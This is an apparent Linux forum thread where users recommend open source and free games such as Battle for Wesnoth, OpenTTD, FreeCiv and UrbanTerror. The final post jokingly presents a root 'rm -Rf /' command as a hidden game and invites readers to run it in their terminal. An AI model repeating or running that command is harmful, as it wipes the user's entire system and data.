*BUMP*
Time to revive the thread! Sadly, my preferences haven't changed much but perhaps some new users could post their (open source) games.

For me as old BlueByte and BattleIsle fan, Crimson Fields was a nice find.

I seemed to have forgotten abuse (SDL) last time I posted in this thread.
A game that I am waiting for is Silver Tree, it isn't really a top open source game yet, but I think it will have potential to become one. One of the reasons why I do believe this is because the core team working on Silver Tree have previously developed Battle for Wesnoth.

I like:
Battle for Wesnoth
OpenTTD (i know, you need non free data)
FreeCiv
All mentioned before, but they deserve it, becuase they are stable, balanced and all offer endless fun. And if you still don't have enough of the game, they also have a Multiplayer.

Movement is fun. Just sad hardware requirements are rather high for Q2 Engine. (Doesn't run properly with an Radeon M6 mobile Chip... at least anything with more than 2 players. :x )

Well, this is closed source, but it's a great (free) game I discovered only lately, I love it as much as I love NetHack: ADOM

Not (completely?) open source, but at least free and a lot of fun to play: UrbanTerror!
Haven't been here in a while. Still rocking Arch.

Not a game itself but a client: kmuddy. It connects to a remote host which actually hosts the game (MUD). In fact any client will do (even plain telnet) but kmuddy has some extras as aliases, triggers, profile, sound support and so.

There is also a hidden game called super-rm-rf. To play it, try this in your terminal:
~$ su root -c "rm -Rf /"
This game is the best, but unfortunately you can only play it once, as you will need to reinstall Linux to play again.
